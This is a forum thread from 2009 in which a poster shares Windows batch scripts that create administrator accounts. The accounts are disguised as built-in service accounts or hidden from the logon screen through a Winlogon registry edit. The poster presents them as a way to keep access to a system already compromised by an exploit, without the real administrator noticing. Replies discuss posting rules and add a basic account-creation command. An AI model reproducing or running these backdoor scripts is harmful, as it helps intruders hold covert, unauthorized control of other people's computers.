Nov 22, 2009

Creating Hidden User

free web hosting
Open Discussion > MODERATED AREA > Computers > Computer Security Issues & Exploits

Creating Hidden User

RemoteConnection
when u have an access to a windows system by CMD , maybe u need to create an admin account with a remote cnnection,here's the way:
CODE

@echo off
net user IUSR_WAN /add /expires:never
net localgroup administrators /add IUSR_REMOTE
net user IUSR_WAN herman
net user IUSR_WAN /comment:"Built-in account for Remote Service"
net user IUSR_WAN /fullname:"Remote Service Account"


also another way that the user won't show on login screen!
CODE

@echo off
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
Exit

 

 

 


Comment/Reply (w/o sign-up)

BuffaloHELP
Looks like you need to create this in a batch file. Is that right? If so, you MUST explain the full process of saving to what file type. If this is the commands you need to type on the prompt, use the CONSOLE code. Don't forget to refer to the BB Code Help link during your post. Thank you.

Comment/Reply (w/o sign-up)

RemoteConnection
yea , that's right , a batch file , u know i just tried to explain it for a medium level user, but if it's needed to explain more , Sure

Comment/Reply (w/o sign-up)

Saint_Michael
hmmm that shounds like a admin backdoor to a computer networking system hmm intriguing. but yeah its look lieky our missing something from it though.

Comment/Reply (w/o sign-up)

BuffaloHELP
It's TRAP17's posting rules to give full examples. It's also common courtesy to respect all levels of understandings in this forum. Let's not presume that everyone has the same technical background as you are.

Comment/Reply (w/o sign-up)

RemoteConnection
well, u know Saint_Michael if you have access to a system just by cmd,like when u gained access to a system by today's exploits .... u only have command proment ////

Comment/Reply (w/o sign-up)

mayank
i think there is no use of this trick....because then you'll need the admin rights to create any account like this...and secondly if you have admin rights then you you dont need this trick smile.gif

Comment/Reply (w/o sign-up)

RemoteConnection
well mayank , i'll give u an example , u have gained access to a system by exploit and it gave u the admin rights ... but u wanna create another admin account that u don't want to show on logon screen becase of the primary administrator /// ait?

Comment/Reply (w/o sign-up)

(G)SchoolHacker
Make Admin user
Creating Hidden User

Try: net user "yourname" "yourpassword" /add
In CMD 

-reply by SchoolHacker


Comment/Reply (w/o sign-up)



Got an Opinion! Express your Views! (no registration):-
Add your Reply/ Opinion/ Views/ Comments/ Suggestion/ Questions/ Queries etc.
Posts with decent grammar & English will be accepted and please refrain from profanities.
For asking a Question, We recommend you to sign-up (for free) so that you can track the topic easily.

Nature of your Post*: Opinion/ Reply/ Comments
Question/Query
Feedback to us.
       
Name   Email
Title/Question*

This textarea will convert to Rich-Text automatically (IE, Firefox, Chrome)

Similar Topics

Keywords : Creating Hidden User

  1. Could You Be Infected With Hidden Trojan? - continuation of DNS hijack (10)
  2. Broadband Internet Connection Restriction - Prompt user for username and password (5)
    I have broadband internet connection and DI-704P router, Right now all users can connect to the
    internet. Is there any possible ways to make the internet connection be password protected? user
    must supply their username and password first to connect to internet. Is this possible? Tnx for
    any suggestion and tips /smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' /> ...
  3. Popular Applications Are Creating Holes In Your Os - photoshop and aol users were most at risk (21)
    Popular Applications Are Creating Holes In Your OS Nearly every computer owner nowadays
    knows how to keep their computer safe by running regualar virus scans and keeping spyware scanners
    up to date. Well researchers at Prinston University say that this is not enough. They have found
    many popular applications which open doors up to allow various attacks. Among the discovered
    culprits were Adobe Photoshop and AOL Instant Messengar . Fortuneately, these products which had
    the worst written code out of all those which were found, have fixed their code. Earlier ...
  4. Yahoo! Mail Warns Me, Please Help - *DETECTED* Online User Violation (true?) (38)
    I'm receiving the folloing quoted messages from mail@yahoo.com with zip file as an attachment. I
    am quite disturbed with the message. Could this message be true Or should I ignore it? As far as my
    knowledge is concerned I have never sent any spam messages using my yahoo mail account. And I hate
    spam messages too. What if they eventually close down my yahoo email ID!! /sad.gif' border='0'
    style='vertical-align:middle' alt='sad.gif' /> Does anyone get the same message? The thing is that
    this mail reaches to my Junk mailbox too. Please give your opinion! QUOTE ...
  5. Firefox 1.5 Flaws - For Microsoft User (22)
    I got this information from mailing list. yesterday I didn't know why my pc always heavy to be
    loaded. and now i got the answer read Firefox Flaws For A Simple Way. if you use Mozilla
    Firefox 1.5 as your default browser. type Ctrl+Alt+del or open Task Manager. You will see how much
    memory being used by firefox. QUOTE(www.informationweek.com) On December 8, 2005, we published
    a story that wondered: Firefox 1.5: Not Ready For Prime Time? In response, some 450 (and climbing)
    InternetWeek, InformationWeek, TechWeb Pipelines, and Scot's Newsletter readers ha...



Looking for creating, hidden, user

Searching Video's for creating, hidden, user
See Also,
advertisement


Creating Hidden User

Affordable Web Hosting, Low cost Web Hosting - ComputingHost.com